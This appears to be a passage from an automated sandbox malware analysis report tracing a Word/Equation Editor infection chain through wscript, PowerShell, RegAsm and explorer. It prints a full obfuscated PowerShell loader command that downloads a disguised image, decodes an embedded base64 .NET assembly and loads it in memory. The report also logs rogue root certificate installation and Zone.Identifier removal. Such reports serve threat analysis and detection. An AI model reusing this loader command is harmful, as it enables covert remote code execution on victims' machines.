            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000007.00000002.365103207.0000000003659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366645205.0000000006300000.00000004.08000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_005401F4 push eax; retf 1_2_005401F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0054C264 pushad ; retn 0054h1_2_0054C289
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_00548EE2 push eax; retf 1_2_00548F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0055EBB4 push eax; ret 1_2_0055ECAB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 1_2_0054C3A2 push A00054C4h; ret 1_2_0054C3F5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00555924 push 34010160h; iretd 7_2_0055592D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00552D95 pushad ; ret 7_2_00552D99
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00552DA5 pushfd ; ret 7_2_00552DA9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040134A pushfd ; retf 10_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004012F2 pushfd ; retf 10_2_004012F3
            Source: C:\Windows\explorer.exeCode function: 20_2_00061405 push esi; ret 20_2_00061407
            Source: C:\Windows\explorer.exeCode function: 20_2_000647A7 push esp; iretd 20_2_000647A8
            Source: C:\Windows\explorer.exeCode function: 20_2_000614D4 push esi; ret 20_2_000614D6
            Source: C:\Windows\explorer.exeCode function: 20_2_0006A055 push es; iretd 20_2_0006A05D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008967E push ds; retf 21_2_00089680
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000894E6 push edx; ret 21_2_000894E7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000838A7 push esp; iretd 21_2_000838A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000887CE push es; ret 22_2_00088A18
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00088EEF push edi; ret 22_2_00088EF0
            Source: C:\Windows\explorer.exeCode function: 23_2_00061405 push esi; ret 23_2_00061407
            Source: C:\Windows\explorer.exeCode function: 23_2_000614D4 push esi; ret 23_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_000C3417 push esp; iretd 24_2_000C3418
            Source: C:\Windows\explorer.exeCode function: 25_2_00061405 push esi; ret 25_2_00061407
            Source: C:\Windows\explorer.exeCode function: 25_2_000645A7 push esp; iretd 25_2_000645A8
            Source: C:\Windows\explorer.exeCode function: 25_2_000614D4 push esi; ret 25_2_000614D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00083627 push esp; iretd 26_2_00083628
            Source: C:\Windows\explorer.exeCode function: 27_2_00061405 push esi; ret 27_2_00061407
            Source: C:\Windows\explorer.exeCode function: 27_2_000614D4 push esi; ret 27_2_000614D6
            Source: C:\Windows\explorer.exeCode function: 27_2_0006AC8D push esp; iretd 27_2_0006AC95
            Source: C:\Windows\explorer.exeCode function: 27_2_0006AAD2 push ebp; iretd 27_2_0006AAD3

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gwseuhaJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gwseuhaJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gwseuha:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
